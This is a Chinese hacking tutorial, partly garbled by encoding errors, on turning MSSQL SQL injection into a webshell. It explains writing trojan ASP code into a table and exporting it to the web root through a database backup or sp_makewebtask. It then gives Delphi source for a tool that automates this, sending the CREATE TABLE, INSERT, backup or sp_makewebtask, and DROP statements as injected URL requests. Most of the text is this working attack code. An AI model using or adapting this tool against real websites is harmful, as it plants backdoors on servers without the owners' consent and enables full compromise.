一.通過SQL注入得到WEBSHELL的原理:
N.E.V.E.R的方法:利用數(shù)據(jù)庫備份得到WEBSHELL。創(chuàng)建一個表,在表中建一個字段用來保存木馬數(shù)據(jù)。然后利用MSSQL導(dǎo)出庫文件的辦法把整個數(shù)據(jù)導(dǎo)出來,最后再刪除新建的表。
分析: N.E.V.E.R利用了MSSQL的備份數(shù)據(jù)庫功能。把數(shù)據(jù)導(dǎo)出來,設(shè)想數(shù)據(jù)庫中有<%%>之類的ASP標(biāo)實符,導(dǎo)出文件,文件名以.ASP的形式保存。然后文件又保存在WEB的路徑下。那么這個導(dǎo)出的ASP文件是不是要去解釋<%%> 之內(nèi)的語句呢?如果數(shù)據(jù)庫中有的表中有<%%>標(biāo)實符,并且這之中有錯誤,那么我們導(dǎo)出來生成的ASP文件也會有誤。不過,這種機(jī)會也不太大。
再來看看CZY的方法吧。
CZY的方法:前面的和N.E.V.E.R的方法基本上差不多。只是后面用到了擴(kuò)展存儲過程——sp_makewebtask。這個擴(kuò)展存儲過程的作用就是:可以把MSSQL數(shù)據(jù)庫中的某個表中的記錄導(dǎo)出來,以文件的方法保存起來。這種方法就不會出現(xiàn)什么問題原因在于:我們只去讀表中的某個字段中的值。把字段的信息導(dǎo)出來生成文件。這個字段中的值都是我們剛加上的。自己在加入數(shù)據(jù)的時候,先調(diào)試一下,沒有問題在加入進(jìn)去,導(dǎo)出來就當(dāng)然沒有問題了。
以上兩位的方法,我都手工測試過。利用SQL注入漏洞,建表,向表中加數(shù)據(jù),然后再導(dǎo)出數(shù)據(jù),再刪除表。都是利用的SQL語句。這里我就不多說了,大家可以看本期的文章。
二.利用DELPHI去實現(xiàn)功能的前言
原理都分析過了。我們怎么利用DELPHI來實現(xiàn)他們的手工操作呢?其實方法是非常簡單的。DELPHI提供了一個NMHTTP控件。我們利用這個控件就可以向某個特定的URL提交參數(shù)。然后實現(xiàn)我們的自動注射功能。我馬上要為大家講解的這個程序,有一個特點。也可以說成是一個缺陷吧。程序不去自動猜解WEB的絕對路徑。程序不去判斷當(dāng)前連接SQL數(shù)據(jù)庫的當(dāng)前賬號的權(quán)限。我為什么要這么做?因為得到這兩者用SQL注入是非常難得到的。所以,我們程序發(fā)送命令就不會考慮太多。成不成功你執(zhí)行完自己去看看生成沒有就OK了。
三.如何利用DELPHI得到WEBSHELL。
程序中用到的值。我們這里來看看有哪些:URL路徑,遠(yuǎn)程WEB絕對路徑(通過其他方法得到,你一定有辦法的) 采用什么方法去得到WEBSHELL(也就是兩位的方法,你選哪一種)。我們同時要求點擊一個按紐開始執(zhí)行命令,和點擊一個按紐來終止命今。最后就是新建的表的名稱,以及表的字段名稱,再次就是字段的類型。前面的我們在程序中放上輸入,選擇之類的控件就行了。后面的我們設(shè)一個選項按紐點按紐彈出相應(yīng)設(shè)置。再把這些相應(yīng)的設(shè)置用一個RECORD來保存。
首先,我們在DIT控件。名稱分別是:UrlET //URL路徑的輸入框、ShellPathET //遠(yuǎn)程木馬的位置、CustomBdoorET//自定義木馬的位置。再放兩個RadioButton用來選擇采用什么方式獲取WEBSHELL。CAPTION分別取名為: BackUP DataBase 和 WEB作業(yè)。然后再放三個SpeedButtion按紐。名稱分別是:設(shè)置,開始,停止, 最后再放一個MEMO控件。來顯示當(dāng)前添加的信息。到此界面上的工作就做完了。界面如圖:
現(xiàn)在來寫程序了。
我們首先定義一個RECORD。
如下:
Type
SetOption = Record
TableName : String; //用來保存要創(chuàng)建的表名.
FieldName : String; //用來保存要創(chuàng)建的字段名.
FiledType : String; //用來保存創(chuàng)建的字段名類型.
End;
FiledType字段類型的值是以下類型的一種:
Bigint binary bit char datetime decimal float image int money nchar ntext numeric nvarchar real smalldatetime smallint
Smallmoney sql_variant text timestamp tinyint uniqueidentifier varbinary varchar 這些都是MSSQL字段類型值.
再定義一個全局變量:
Var
ISStop : Boolean; //用來判斷用戶是否按下了停止按紐.
好了。在表單創(chuàng)建的過程中,我們?yōu)镽ECORD記錄輸入默認(rèn)值.
代碼如下:
procedure TMainForm.FormCreate(Sender: TObject);
begin
sOption.TableName :='cyfd'
sOption.FieldName :='gmemo'
sOption.FiledType :='text'
end;
現(xiàn)在我們添加開始執(zhí)行命令的代碼。
先定義BDoorList 為TstringList。主要目的就是把木馬的內(nèi)容加進(jìn)來.
創(chuàng)建兩個變量來保存urlET.和ShellPathET的值.方便程序簡化調(diào)用.
在程序開始執(zhí)行前,我們得先檢查一下用戶的輸入
定義一個Checkinput函數(shù).
如下:
Function CheckInput : Boolean;
Begin
Result := False;
if Trim(urlet.Text) = '' then
Begin
Application.MessageBox('請輸入URL地址!','提示',mb_ok+mb_iconinformation);
Exit;
End;
if Trim(ShellPathET.Text) = '' then
Begin
Application.MessageBox('請輸入文件保存地址!','提示',mb_ok+mb_iconinformation);
Exit;
End;
IF DefBDoor.Checked then
Begin
if Not FileExists(extractfilepath(Application.ExeName)+'默認(rèn)木馬.txt') then
Begin
Application.MessageBox('沒有找到 [默認(rèn)木馬.txt] 文件!','提示',mb_ok+mb_iconinformation);
Exit;
End;
End
Else
if Not FileExists(CustomBdoorET.Text) then
Begin
Application.MessageBox('沒有找到所選的木馬文件!','提示',mb_ok+mb_iconinformation);
Exit;
End;
Result := True;
End;
在最開始加入:
IF Not CheckInput then Exit; //如果輸入不合法就退出過程.
好了,如果用戶輸入沒什么錯,我們就來下面的代碼。
首先我們把IsStop設(shè)為假。創(chuàng)建BdoorList。
BDoorList := TstringList.Create;
再加木馬內(nèi)容到BDoorlist.
BDoorList.LoadFromFile(CustomBdoorET.text);
好了,在這里我還要給大家說一下:用NMHTTP提交數(shù)據(jù)的時候.要把輸入的一些特別符號轉(zhuǎn)達(dá)成編碼。我們這里要把空格和%符號替換成相應(yīng)的編碼分別是:%20和%25,不然.程序加不進(jìn)數(shù)據(jù)。
代碼如下:
BDoorList.Text:=StringReplace(BDoorList.Text,'%','%25',[rfReplaceAll]);
BDoorList.Text:=StringReplace(BDoorList.Text,' ','%20',[rfReplaceAll]);
接下來.我們就提交建表的功能了.
Memo.Lines.Add('建表...');
Memo.Lines.Add(''); NMHttp.Get(Url+'CREATE%20TABLE%20[dbo].['+sOption.TableName+']%20(['+sOption.FieldName+']%20['+sOption.FiledType+']);');
這樣我們就創(chuàng)建了一個表。然后.我們向表中加記錄:
代碼如下:
Memo.Lines.Add('加數(shù)據(jù)...');
Memo.Lines.Add('');
For i:=0 to BDoorList.Count-1 do //這里用一個循環(huán)把木馬的內(nèi)容加進(jìn)表中去.
Begin
IF IsStop then //這里如果點了停止按紐程序?qū)⒔K止任務(wù).
Begin
BDoorList.Free;
Exit;
End; NMhttp.Get(Url+'Insert%20into%20'+sOption.TableName+'%20('+sOption.FieldName+')%20values%20('''+BDoorList.Strings+''');');
Memo.Lines.Add('Add Line '+Inttostr(i+1));
End;
現(xiàn)在就是導(dǎo)出數(shù)據(jù)生成木馬了.
Memo.Lines.Add('導(dǎo)出數(shù)據(jù)...');
Memo.Lines.Add('');
IF BKData.Checked then //如果選中采用備份數(shù)據(jù)就執(zhí)行下面的命令.
NMhttp.Get(Url+'declare%20@a%20sysname;select%20@a=db_name();backup%20database%20@a%20to%20disk='''+ShellPath+'''')
Else //如果是用WEB作業(yè)的形式. NMhttp.Get(Url+'EXECUTE%20sp_makewebtask%20@outputfile='''+ShellPath+''',@query='''+'select%20'+sOption.FieldName+'%20from%20'+sOption.TableName+'''');
我們再刪除剛建的表。NMHttp.Get(Url+'drop%20TABLE%20[dbo].['+sOption.TableName+'];');
這樣我們的任務(wù)就完成了。下面來釋放變量.
BDoorList.Free;
再來向停止按紐中添加點擊事件:
一行代碼就行了:IsStop := True;
到這里主表單的內(nèi)容基本上完成了。現(xiàn)在我們來看設(shè)置表單中怎么來設(shè)置.其實非常簡單.主表單中已經(jīng)定義了一個RECORD.我們只需要將用戶輸入的新值,再次賦給RECORD就行了。
設(shè)置表單中先引用主表單.然后在界面中添加二個EDIT控件:
第一個名稱為:TableNameET //保用戶輸入的存臨時表
第二個名稱為:FieldNameET //用來保存用戶輸入的字段名.
再添加一個Combobox //用來保存用戶所選的字段類型值.
名稱:FieldTypeCombox
OK.界面如下:
代碼如下:
定義一個過程,主表單好調(diào)用這個設(shè)置。
Procedure ShowSet;
Begin
Application.CreateForm(TSetForm,SetForm);
With SetForm do
Begin
TableNameET.Text := sOption.TableName;
FieldNameET.Text := sOption.FieldName;
FieldTypeCombox.ItemIndex := FieldTypeCombox.Items.IndexOf(sOption.FiledType);
End;
SetForm.ShowModal;
SetForm.Free;
End;
在主表單中設(shè)置的點擊事件中添加上showset過程就行了。
下面就是點擊確定的代碼了。
IF CheckInput then
Begin
sOption.TableName := Trim(TableNameET.Text); //把用戶的輸入賦給RECORD.
sOption.FieldName := Trim(FieldNameET.Text);
sOption.FiledType := FieldTypeCombox.Text;
Close;
End;
這里又有一個CheckInput主要就是檢查用戶輸入的值是不是合法。
代碼如下:
Function CheckInput : Boolean;
Begin
Result := False;
IF Trim(TableNameET.Text)='' then
Begin
Application.MessageBox('請輸入臨時表名!','提示',mb_ok+mb_iconinformation);
Exit;
End;
IF Trim(FieldNameET.Text)='' then
Begin
Application.MessageBox('請輸入字段名!','提示',mb_ok+mb_iconinformation);
Exit;
End;
Result := True;
End;
到這里程序就完了。